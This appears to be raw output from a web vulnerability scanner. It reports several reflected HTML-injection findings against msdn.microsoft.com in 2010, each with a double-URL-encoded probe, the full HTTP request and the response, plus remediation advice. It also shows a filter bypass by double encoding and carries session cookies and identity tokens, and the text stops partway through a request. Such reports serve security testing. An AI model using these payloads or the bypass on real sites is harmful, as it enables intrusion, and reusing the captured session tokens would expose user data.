<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb871519.aspx54530"><a>0117325841e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c4c%2522%253e%253ca%253eee87a223ebb was submitted in the REST URL parameter 1. This input was echoed as 61c4c"><a>ee87a223ebb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us61c4c%2522%253e%253ca%253eee87a223ebb/library/cc295789.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:39 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us61c4c"><a>ee87a223ebb/library/cc295789" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a01%2522%253e%253ca%253ede0d876fda0 was submitted in the REST URL parameter 2. This input was echoed as 44a01"><a>de0d876fda0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library44a01%2522%253e%253ca%253ede0d876fda0/cc295789.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library44a01"><a>de0d876fda0/cc295789" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e327%2522%253e%253ca%253e398a6fe2bd2 was submitted in the REST URL parameter 3. This input was echoed as 9e327"><a>398a6fe2bd2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/cc295789.aspx9e327%2522%253e%253ca%253e398a6fe2bd2 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:01 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/cc295789.aspx9e327"><a>398a6fe2bd2" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56fbf%2522%253e%253ca%253e18d7c0c0b34 was submitted in the REST URL parameter 1. This input was echoed as 56fbf"><a>18d7c0c0b34 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us56fbf%2522%253e%253ca%253e18d7c0c0b34/library/dd208104(PROT.10 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9215 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us56fbf"><a>18d7c0c0b34/library/dd208104(PROT.10" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45d7%2522%253e%253ca%253e649622910d4 was submitted in the REST URL parameter 2. This input was echoed as a45d7"><a>649622910d4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya45d7%2522%253e%253ca%253e649622910d4/dd208104(PROT.10 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9216 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya45d7"><a>649622910d4/dd208104(PROT.10" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 797d1%2522%253e%253ca%253e5235629b1dd was submitted in the REST URL parameter 3. This input was echoed as 797d1"><a>5235629b1dd in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd208104(PROT.10797d1%2522%253e%253ca%253e5235629b1dd HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 